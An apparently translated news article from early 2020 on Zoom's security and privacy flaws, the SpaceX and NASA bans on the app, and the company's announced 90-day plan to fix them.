Due to widespread of self-isolation and quarantine, the Zoom video conferencing application has gained unprecedented popularity: the number of its users has increased from 10,000,000 in December 2019 to 200,000,000 in March 2020. However, the number of bug reports in the application reached a critical mass: SpaceX and NASA even forbid employees from using Zoom.
Earlier, we have already talked about the fact that the media and information security experts harshly criticize the application.The fact is that Zoom reveals new problems with privacy, as well as serious vulnerabilities. For example, it was noticed that the application damped data to Facebook, was cunning at about end-to-end encryption, and also did not explain why it collects information about users at all. Cybercriminals also spread malware through the fake zoom domains.
Users reported that hundreds of strangers appeared in their contact lists due to a bug, and experts found that the Zoom Windows client converts UNC paths into links, while on Zoom for MacOS attackers can remotely execute arbitrary code on the target system. Moreover, the developers are completely non-operative to respond to these threats.
“We developed our product without assuming that in a few weeks every person in the world would suddenly begin to work, study and communicate from home,” — says Eric Head Yuan, apologizing for all the problems found in the application.
It seems that now the situation has reached a critical point. So, it became known that recently Elon Musk forbade SpaceX employees to use Zoom, since the application has “significant security and privacy issues”. Instead, it was recommended to use good old emails and phones. Moreover, NASA’s American space agency soon after that banned its employees from using Zoom for the same reasons.
After this news, Zoom developers reported about fixes to a number of problems discovered by experts. In particular, the developers apologized for the confusion over E2E encryption, removed a spooky feature from Zoom that allowed tracking users’ attention, and also got rid of the code that merged LinkedIn and Facebook data).
They also said that they would immediately stop development of the application for 90 days, fully focus on improving its security, and conduct an audit with the involvement of third-party specialists.
Also in Zoom plan:
- Prepare transparency reports that detail information related to requests for data, records, and content;
- improve the existing bug bounty program;
- in partnership with leading CISO industries, create a CISO Council to discuss best practices for security and privacy;
- conduct a series of white-box pentests to identify and solve problems;
- Starting next week, weekly webinars will be held on privacy and security updates.